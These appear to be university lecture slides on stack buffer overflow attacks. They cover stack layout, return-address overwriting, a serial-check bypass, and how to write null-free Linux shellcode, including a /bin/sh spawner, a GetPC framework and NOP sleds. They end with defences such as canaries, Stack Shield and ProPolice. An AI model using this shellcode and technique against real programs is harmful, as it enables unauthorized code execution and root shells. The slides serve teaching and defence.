Attacks Using Stack Buffer Overflow

advertisement
Attacks Using Stack Buffer Overflow
Boxuan Gu
gub@cse.ohio-state.edu
Reference
The Art of Computer Virus Research and
Defense (Symantec Press) (Paperback)
By Peter Szor
Outline

Background

Stack buffer overflow

Shell code

How to prevent stack buffer overflow
Background

Many vulnerability of applications are not from their
specifications and protocols but from their
implementations

Weak implementation of passwords

Buffer Overflow (can be used to redirect the control
flow of a program)

race conditions

bugs in permissions
Background-Buffer overflow

Typical Attack Scenario:

Users enter data into a Web form

Web form is sent to server

Server writes data to buffer, without checking length of input data

Data overflows from buffer

Sometimes, overflow can enable an attack

Web form attack could be carried out by anyone with an Internet
connection
Background-layout of the Virtual Space of a Process
The
layout of
the
virtual
space of
a
process
in Linux
Cont.



Code and data consist of instructions and initialized ,
uninitialized global and static data respectively;
Runtime heap is used for dynamically allocated
memory(malloc());
The stack is used whenever a function call is made.
Layout Of Stack



Grows from high-end address to low-end address
(buffer grows from low-end address to high-end
address);
Return Address- When a function returns, the
instructions pointed by it will be executed;
Stack Frame pointer(esp)- is used to reference to local
variables and function parameters.
Example
low-end
address
esp
int cal(int a, int b)
{
int c;
c = a + b;
return c;
}
int main ()
{
int d;
d = cal(1, 2);
printf("%d\n", d);
return;
}
c
ebp
previous ebp
ret addr(0x08048229)
a(1)
b(2)
Stack
high-end
address
Dump of assembler code for
function main:
0x08048204 <main+0>:
0x08048208 <main+4>:
0x0804820b <main+7>:
0x0804820e <main+10>:
0x0804820f <main+11>:
0x08048211 <main+13>:
0x08048212 <main+14>:
0x08048215 <main+17>:
parameter
0x0804821d <main+25>:
parameter
0x08048224 <main+32>:
0x08048229 <main+37>:
0x0804822c <main+40>:
0x0804822f <main+43>:
0x08048233 <main+47>:
0x0804823a <main+54>:
0x0804823f <main+59>:
0x08048242 <main+62>:
0x08048243 <main+63>:
0x08048244 <main+64>:
0x08048247 <main+67>:
lea 0x4(%esp),%ecx
and $0xfffffff0,%esp
pushl -0x4(%ecx)
push %ebp
mov %esp,%ebp
push %ecx
sub $0x24,%esp
movl $0x2,0x4(%esp) ; pass
movl $0x1,(%esp)
; pass
call 0x80481f0 <cal>
mov %eax,-0x8(%ebp)
mov -0x8(%ebp),%eax
mov %eax,0x4(%esp)
movl $0x80a0c88,(%esp)
call 0x8048c40 <printf>
add $0x24,%esp
pop %ecx
pop %ebp
lea -0x4(%ecx),%esp
ret
Dump of assembler code for function cal:
0x080481f0 <cal+0>: push %ebp
0x080481f1 <cal+1>: mov %esp,%ebp
0x080481f3 <cal+3>: sub $0x10,%esp ; reserve 16 bytes for local variables in stack
0x080481f6 <cal+6>: mov 0xc(%ebp),%eax
0x080481f9 <cal+9>: add 0x8(%ebp),%eax
0x080481fc <cal+12>:
mov %eax,-0x4(%ebp)
0x080481ff <cal+15>:
mov -0x4(%ebp),%eax
0x08048202 <cal+18>:
leave
0x08048203 <cal+19>:
ret
Layout of Heap

Global variables

Static variables

Dynamically allocated memory
Stack Buffer Overflow


A buffer overflow occurs when too much data is put into
the buffer;
C language and its derivatives(C++) offer many ways to
put more data than anticipated into a buffer;
Example
Int bof()
ESP
{
char buffer[8]; // an 8 bytes buffer which is in the stack
strcpy(“buffer, “AAAAAAAAAAAAAAAAAAA””); // copy 20 bytes
into buffer
// this will cause to the content of “ret” to be overwritten;
// namely, the return address will be 0x41414141(AAAA) EBP
return 1;
}
AAAA
AAAA
AAAA (previous
EBP)
AAAA (RET->printf())
int main ()
{
bof(); // call bof
printf(“end\n”); // will never be executed;
return 1;
}
AAAA
Basic Idea of the Attack using stack buffer overflow
Low
address
Local variable (buffer)
Stack
grows
RET
Attack Code
High
address
TOP of Stack
String
grows
Inject malicious code into
the virtual space of a
process;
Modify the content of RET
to redirect the execution
flow to the malicious code.

Example

Program asks for a serial number that attacker does not know

Attacker also does not have source code

Attacker does have the executable (exe)
•
Program quits on incorrect serial number
Cont.
•
•
•
•
By trial and error, attacker discovers an apparent buffer overflow
Note that 0x41 is “A”
Looks like ret overwritten by 2 bytes!
I think the stack is overwitten by 3 bytes.
Cont.
The goal is to exploit a buffer overflow so that the execution flow can be re-directed to
0x00401034.
Cont.
•
•
•
Find that 401034 is “@^P4” in ASCII ('\0' is 00)
Byte order is reversed? Why?
X86 processors are “little-endian”
Cont.
•
•
•
Reverse the byte order to “4^P@” (\x34\x10\x40\x00) and…
Success! We’ve bypassed serial number check by exploiting
a buffer overflow
Overwrote the return address on the stack
Example-Create a shell
char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main(){
char *name[2];
name[0] = "/bin/sh";
name[1] = 0x0;
execve(name[0], name, 0x0);
exit(0);
}
Shellcode can be looked as a
sequence of binary instructions;
The purpose of this shellcode
is to create a command shell in
linux.
It can be used to create a shell
with root privilege.

Cont.
void sh()
{
int *return;
return = (int *)&return + 2; // let ret point to the unit containing the return address
(*return) = (int)shellcode; // let the return address point to the shellcode (shell code to create
a shell)
}
int main()
{
sh();
printf("main end :)\n");
return;
}
Cont.
(gdb) disas sh
Dump of assembler code for function sh:
0x08048208 <sh+0>:push %ebp
0x08048209 <sh+1>:mov %esp,%ebp
0x0804820b <sh+3>:sub $0x10,%esp
0x0804820e <sh+6>:lea -0x4(%ebp),%eax
0x08048211 <sh+9>: add $0x8,%eax
0x08048214 <sh+12>:
mov %eax,0x4(%ebp)
0x08048217 <sh+15>:
mov 0x4(%ebp),%edx
0x0804821a <sh+18>:
mov
$0x80bd6a0,%eax
0x0804821f <sh+23>:
mov %eax,(%edx)
0x08048221 <sh+25>:
leave
0x08048222 <sh+26>:
ret
return
Previous ebp
RET
Three issues for injecting codes

How to find a location in the stack to inject malicious code?

How to generate a shellcode (Attack Code)?

How to redirect the execution flow to the shellcode?

If using stack buffer overflow, the content of memory
unit storing return address should be modified.

The injected payload should be long enough to do
overwriting.
How to find a location to inject code



If using stack buffer overflow, we might need to locate the stack
of a function.
Then we need to determine the offset from the bottom or the
top of stack to inject the shell code
We can use the following code to locate a stack:
unsigned long find_start(void)
{
__asm__("movl %esp, %eax");
}
unsigned long find_end(void)
{
__asm__("movl %ebp, %eax");
}
Cont.
unsigned long find_start(void)
{
__asm__("movl %esp, %eax");
}
unsigned long find_end(void)
{
__asm__("movl %ebp, %eax");
}
int main()
{
printf("0x%x\n",find_start());
printf("0x%x\n",find_end());
}
Shell code




Shellcode is defined as a set of instructions which is injected
and then is executed by an exploited program;
Shellcode is used to directly manipulate registers and the
function of a program;
Most of shellcodes use system call to do malicious behaviors;
System calls is a set of functions which allow you to access
operating system-specific functions such as getting input,
producing output, exiting a process;
How to execute a system call in Linux?


Use libc wrappers

Ex: read, write etc;

Works indirectly with assembly code to execute system
calls;
Directly use assembly code

System call via software interrupts, for example int 0x80;
In Linux, a shell code uses int 0x80 to raise system calls.
The process of executing a system
call


The specific system call is loaded into EAX;
Arguments to the system call function are placed in other
registers;

The Instruction int 0x80 is executed;

The CPU switches to Kernel mode;

The system call function is executed.
Example:

main()
{

exit(0);
}

Cont.
gcc -g -static -o exit exit.c
gdb exit
Arlington:/home/src/shellcodes/code/ch03# gdb exit
GNU gdb 6.7.1-debian
Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/i686/cmov/libthread_db.so.1".
(gdb) disas _exit
Dump of assembler code for function _exit:
0x0804df4c <_exit+0>:
mov 0x4(%esp),%ebx
0x0804df50 <_exit+4>:
mov $0xfc,%eax
0x0804df55 <_exit+9>:
int $0x80
0x0804df57 <_exit+11>:
mov $0x1,%eax
0x0804df5c <_exit+16>:
int $0x80
0x0804df5e <_exit+18>:
hlt
End of assembler dump.
Write a shell code for exit()

The shell code should do the following:

Store the value of 0 into EBX;

Store the value of 1 into EAX;

Execute int 0x80 instruction
Cont.
First, we write ASM codes (exit.asm) as follows:
Section .text
global _start
_start:
mov ebx, 0
mov eax, 1
int 0x80
Cont.
Arlington:/home/src/shellcodes/# nasm -f elf exit.asm
Arlington:/home/src/shellcodes/# ld -o exit_1 exit.o
Arlington:/home/src/shellcodes/# objdump -d exit_1
exit_1:
file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060:
bb 00 00 00 00
8048065:
b8 01 00 00 00
804806a:
cd 80
mov $0x0,%ebx
mov $0x1,%eax
int $0x80
Red words can be used as the shell code.
Cont.
char shellcode[] = "\xbb\x00\x00\x00\x00"
"\xb8\x01\x00\x00\x00"
"\xcd\x80";
int main()
{
int *return;
return = (int *)&return + 2;
(*return) = (int)shellcode;
}
Injectable Shellcode

Null (\x00) will cause shellcode to fail when injected into a
character array because \x00 is used to terminate strings;

Injectable shellcode can't contain \x00;

shellcode[] = "\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80"
injectable shellcode;

How to remove
\x00?

Use “xor ebx, ebx” to replace “mov ebx, 0”

Use “mov al, 1 ” to replace “mov eax, 1”
is not an
Cont.
bb 00 00 00 00
b8 01 00 00 00
cd 80
mov $0x0,%ebx
mov $0x1,%eax
int $0x80
After the transformation, the code is changed to :
31 db
b0 01
cd 80
xor %ebx, %ebx
mov $0x1,%al
int 0x80
shellcode[]=”\x31\xdb\xb0\x01\xcd\x80”
Questions

What is a stack frame?

What is a return address?

Can we inject shellcodes into any area of the
address spaces of processes?
A framework for injectable shellcode
Jmp short GotoCall
shellcode:
pop esi
// esi will contain the address of '/bin/sh'
<shellcode meat>
GotoCall:
Call shellcode // GetPC code
Db '/bin/sh'
GetPC Code

Call

fsave/fstenv

Can be used to get the address of last FPU instruction

fldz

fnstenv [esp-12]

pop ecx

add cl, 10


nop
ECX will hold the address of the EIP.
An Example
section .text
global _start
_start:
jmp short
GotoCall
shellcode:
pop
esi
xor
eax, eax
mov byte
[esi + 7], al
lea
ebx, [esi]
mov long
[esi + 8], ebx
mov long
[esi + 12], eax
mov byte
al, 0x0b
mov
ebx, esi
lea
ecx, [esi + 8]
lea
edx, [esi + 12]
int
0x80
GotoCall:
Call
shellcode // GetPC Code
db
'/bin/shJAAAAKKKK' // AAAA and KKKK can be parameters for system
calls
NOP Sled


Determining the correct offset for injecting code is not easy;
NOP (non operation) sled can be used to increase the number
of potential offsets;

Generally, we can fill in the beginning of shellcode with NOPs.

The opcode for NOP is 0x90

EX: shellcode[]=”\x90\x90\x90\x31\xdb\xb0\x01\xcd\x80”

Some FPU, SSE, MMX instructions can also be used as sled .
Summary of Launching An Attack


Find a buffer overflow that can be used to
redirect the control flow of the victim program

Stack Buffer Overflow

Heap Buffer Overflow
Inject a segment of malicious shellcode
How to prevent stack buffer
overflow?

Stack Guard

In a stack , a canary word is placed after return address
whenever a function is called;

The canary will be checked before the function returns. If
value of canary is changed , then it indicates an malicious
behavior.
Local Variables
Lower address
Old Base Pointer
Canary Value
Return Address
Arguments
Higher address
6. Unix Stack Frame
Cont.


Canary can still be intact if the attacker overwrites it with the
correct value

Solution – use “random canary” value

Use “terminator canary” – consists of all string terminator sequences –
NULL, ‘\r’, ‘\n’, -1…
Attacker can still point to the ‘return address’ and change it,
without worrying about the canary

This is a short-coming of StackGuard

Can be dealt by XORing the canary value and ‘return address’ to detect
if ‘return address’ has changed
Stack Shield.

Stack Shield

Copy RET address into an unoverflowable memory region;

The values of two RET addresses will be compared before a
function returns;

If the values are different, then an malicious exploitation
occurs;

Needs another stack-like data structure to maintain RET
addresses.
ProPolice



Perhaps most sophisticated
compiler protection
Rearrange local variables
such that char buffers always
are allocated at bottom
addresses ( top of the stack),
and are guarded by a Guard
Value
Does not work fine with small
buffers – somewhat unstable
Local Variables
and Pointers
Lower address
Local char buffers
Guard Value
Old Base Pointer
Return Address
Arguments
Higher address
7. Unix Stack Frame
Cont.

Non-Executable stack;


Return-to-libc exploitation might occur
Randomization.
Download